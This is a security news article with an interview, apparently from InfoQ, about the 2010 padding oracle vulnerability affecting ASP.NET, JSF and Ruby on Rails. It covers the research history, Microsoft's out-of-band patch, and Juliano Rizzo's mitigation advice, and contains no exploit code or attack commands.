Using a Padding Oracle (PO) attack a malicious user can access encrypted data such as cookies, state, membership password, etc. According to Juliano Rizzo and Thai Duong, the security vulnerability affects JavaServer Faces, Ruby on Rails, ASP.NET and other technologies and platforms.
Serge Vaudenay, a professor leading the Security and Cryptography Laboratory (LASEC) at Swiss Federal Institute of Technologies (EPFL), published the paper “Security Flaws Induced by CBC Padding Applications to SSL, IPSEC, WTLS...” (PDF) in 2002, documenting that various padding schemes used to transform block ciphers into variable-input-length encryption schemes can introduce major security flaws.
When a variable input length encrypted message is decrypted based on the RFC 2040 algorithm, the receiver needs to determine what the padding is, if the padding is correct, then to discard it. But RFC 2040 does not specify what the receiver should do if the padding is not correct. Vaudenay concludes:
Although the receiver should not tell the sender that the padding is not correct, it is meaningful that non-procession of a decrypted message ultimately leaks this bit of information.
This leads to an attack that uses an oracle for which any block sequence tells if the padding of the corresponding CBC-decrypted sequence is correct according to the above algorithm [RFC 2040]. The attack works within a complexity of O(NbW) in order to decrypt the message where W is the number of possible words (typically W = 256).
According to Vaudenay, this vulnerability can affect protocols like SSL, IPSEC, WTLS, SSH, existing the possibility to decrypt encrypted data without having the secret key. He demonstrates how the attack works and suggests a possible way to fix the vulnerability.
Starting from Vaudenay’s paper, Juliano Rizzo and Thai Duong, two software engineers specialized in security, wrote a new paper called “Practical Padding Oracle Attacks” (PDF), published on May 25, 2010. The authors claim the Padding Oracle (PO) vulnerability is present in wide spread technologies like JavaServer Faces (JSF), Ruby on Rails, and OWASP ESAPI. They have created and published a tool called POET (Padding Oracle Exploitation Tool) useful to detect if a JSF website is vulnerable to the PO attack.
Rizzo and Duong presented the paper at ekoparty Security Conference on September 17th, unveiling that ASP.NET and SharePoint are vulnerable to PO attacks, but they did not release a POET version for ASP. They say that using PO one can “decrypt cookies, view states, form authentication tickets, membership password, user data, and anything else encrypted using the framework's API!” His disclosure triggered a major reaction from Microsoft, having Scott Guthrie, Corporate VP at Microsoft, and one of his teams working around the clock to find a patch. After 10 days Microsoft released an out-of-band security update for all .NET versions on all platforms, update that appeared on Windows Update. The massive response from Microsoft shows how serious the threat is, and it raises an alarm that many other websites can be vulnerable.
Infoq has talked to Juliano Rizzo on Padding Oracle, POET and ASP.NET.
InfoQ: Have you discovered other platforms beside JSF, Ruby on Rails, ASP.NET that are vulnerable?
JR: We have not looked in detail to any other platform yet, but we are sure there are more platforms, applications and sites vulnerable to the same attack.
InfoQ: What is POET?
JR: The version of POET released five months ago is a proof of concept focused on JSF, we will release a more generic version in the future. We also plan to write a paper about the details of the ASP.NET vulnerability.
We published POET to test JSF sites after Blackhat Europe 2010. This tool can be used to detect the vulnerability but not to get access to systems automatically (demo).
InfoQ: Why there has been so much commotion around ASP.NET lately and there is nothing related to JSF, Ruby on Rails, if they are vulnerable too?
JR: ASP.NET is more popular than JSF and Ruby on Rails, because approximately 25% of the internet sites use ASP.NET.
InfoQ: How can a platform be tested to see if it is vulnerable or not?
JR: Both source code auditing and black-box testing can be use to check if an application is vulnerable. At the moment there isn't any tool available to reliably detect the vulnerability in a generic way.
InfoQ: What do you recommend to platform makers and website admins to do to make sure they are protected from a Padding Oracle attack?
JR: First, there isn't a very good reason to send encrypted data to the web client so developers should find alternative solutions if they can. If encrypted data is sent to the client, the integrity of the ciphertext must be protected to avoid the padding oracle attack or any other attack based on modifying the ciphertext.
Related resources: Important: ASP.NET Security Vulnerability, Frequently Asked Questions about the ASP.NET Security Vulnerability, Update on ASP.NET Vulnerability, ASP.NET Security Update Shipping Tuesday, Sept 28th, ASP.NET Security Update Now Available, ASP.NET Security Fix Now on Windows Update, Microsoft Security Bulletin MS10-070 – Important, Security Advisory 2416728 (Vulnerability in ASP.NET) and SharePoint, More on the asp.net padding oracle vulnerability and POET attacks.